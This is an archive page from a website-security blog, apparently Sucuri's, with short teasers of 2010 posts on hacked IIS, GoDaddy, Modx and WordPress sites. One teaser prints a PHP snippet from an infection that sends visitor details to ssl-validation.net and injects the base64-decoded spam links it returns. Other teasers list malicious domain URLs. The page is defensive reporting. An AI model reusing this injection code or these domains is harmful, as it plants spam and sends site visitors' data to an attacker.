Blog Search
Like Box
Comments
- Dreamhost hacked, mass password-reset issued | ZDNet on DreamHost Security Issue Prompts FTP Password Resets
- Experiences with using GoDaddy, Linux Web Hosting | The (Unorganized) Musings of a Computer Scientist on GoDaddy store your passwords in clear-text and may try to SSH to your VPS without permission
- » Wordpress Security Best Practices & Plugins on Timthumb.php Mass Infection – Aftermath – Part I
- WordPress.org repository will not show plugins older than 2 years on WP-phpmyadmin WordPress plugin – Delete it now
- Wordpress News - The Best WordPress Tips and Tutorials of 2011Wordpress News on Cleaning up an infected website – Part I: WordPress and the Pharma Hack
Tags
alexa apache ask awareness backdoors blacklist blacklisted bluehost dns fox georgia godaddy google guides hacked history honeypot htaccess iis joomla logs malware malware_updates netsol openx oscommerce ossec passwords pharma phishing plugin review sbn scan security spam stats sucuri twitter vbulletin virus vulnerability walmart whois wordpressArchives
- January 2012 (6)
- December 2011 (4)
- November 2011 (4)
- October 2011 (7)
- September 2011 (8)
- August 2011 (16)
- July 2011 (5)
- June 2011 (10)
- May 2011 (10)
- April 2011 (15)
- March 2011 (18)
- February 2011 (13)
- January 2011 (7)
- December 2010 (7)
- November 2010 (9)
- October 2010 (12)
- September 2010 (10)
- August 2010 (7)
- July 2010 (10)
- June 2010 (15)
- May 2010 (19)
- April 2010 (16)
- March 2010 (15)
- February 2010 (8)
- January 2010 (7)
- December 2009 (4)
- November 2009 (1)
- October 2009 (2)
- September 2009 (1)
- August 2009 (6)
- July 2009 (11)
- June 2009 (7)
- May 2009 (4)
- April 2009 (1)
Monthly Archives: September 2010
Attack against IIS/ASP sites – google-stat50.info
A large number of sites have been hacked again in the last few days with a malware script pointing to google-stat50.info (and google-stats50.info) . Not only small sites, but some big ones got hit as well. It is the same … Read more
GoDaddy hacked – Fixing the “headers already sent” error
As you saw over the last few days, various sites at GoDaddy were exploited causing lots of complaints on Twitter and in other places about GoDaddy security. Well, today, many of those sites were reinfected (again) and GoDaddy tried to … Read more
GoDaddy sites hacked – myblindstudioinfoonline.com and Hilary Kneber
We can now confirm there is an undetermined number of sites hosted at GoDaddy that have been attacked and exploited. Our research is showing this is an ongoing issue that started within the last couple hours. All the sites we’ve … Read more
OpenX users – Time to upgrade
*Note that openx.org is currently offline, so we recommend disabling it until you can upgrade. **We are mirroring version 2.8.7 here: http://sucuri.net/openx-2.8.7.tar.gz if you don’t want to wait until openx is back online. ***If your site is hacked/blacklisted and you … Read more
Blackhat SEO Spam C&C: wseow and seotoos up to no good!
We have been tracking these Blackhat SEO Spam C&C (command and control) servers for a while and thought it would be a good time to expose some of the details. They have been actively trying to exploit blogs using old … Read more
ASIS International Website Blacklisted by Google
The official website (asisonline.org) of ASIS International, a major physical security association was hacked and blacklisted yesterday. Add another case to the list of sites using outdated and/or vulnerable applications. In the case of ASIS, they were running a vulnerable … Read more
Success Magazine Blog Hit With Malware
We were analyzing some hacked sites today and one of them was full of SPAM. After some digging, we found that it was loading the Blackhat SEO Spam from blog.success.com (the official blog of Success Magazine). We conducted a quick … Read more
Modx and the new gcounter.cn attack
Quick malware update. See all the latest ones here. We are seeing lately many sites running Modx that are infected with a malware getting loaded from the file /manager/includes/document.parser.class.inc.php. We don’t know yet how the sites are being hacked, but … Read more
Malware update – ssl-validation.net
Quick malware update: The site ssl-validation.net (nice name) is being used to distribute SEO spam and malware (Rhe famous fake AV, say it ain’t so). You can get details of the code being used here: http://sucuri.net/?page=tools&title=blacklist&detail=7ea73e3ac775b52b945d5b45a5abb7ad $outsourceurl="http://ssl-validation.net/gt.php?site=”.urlencode($_SERVER['HTTP_HOST']).’&page=’.urlencode($_SERVER['REQUEST_URI']).’&ip=’.urlencode($_SERVER['REMOTE_ADDR']).’&agent=’.urlencode($_SERVER['HTTP_USER_AGENT']); $links = base64_decode(file_get_contents($outsourceurl)); … Read more
Malware update – seconeo.com,secowo.com,etc
We will be posting some quick malware updates on our blog from now on. If your WordPress site got hacked with malware from any of these domains: http://ae.awaue.com http://ie.eracou.com http://ao.euuaw.com http://aeaaea.com/ou http://secree.com/re http://uoauer.com/si http://oeooea.com/ve http://secowo.com/wo http://ouroue.com/se In addition to remove … Read more
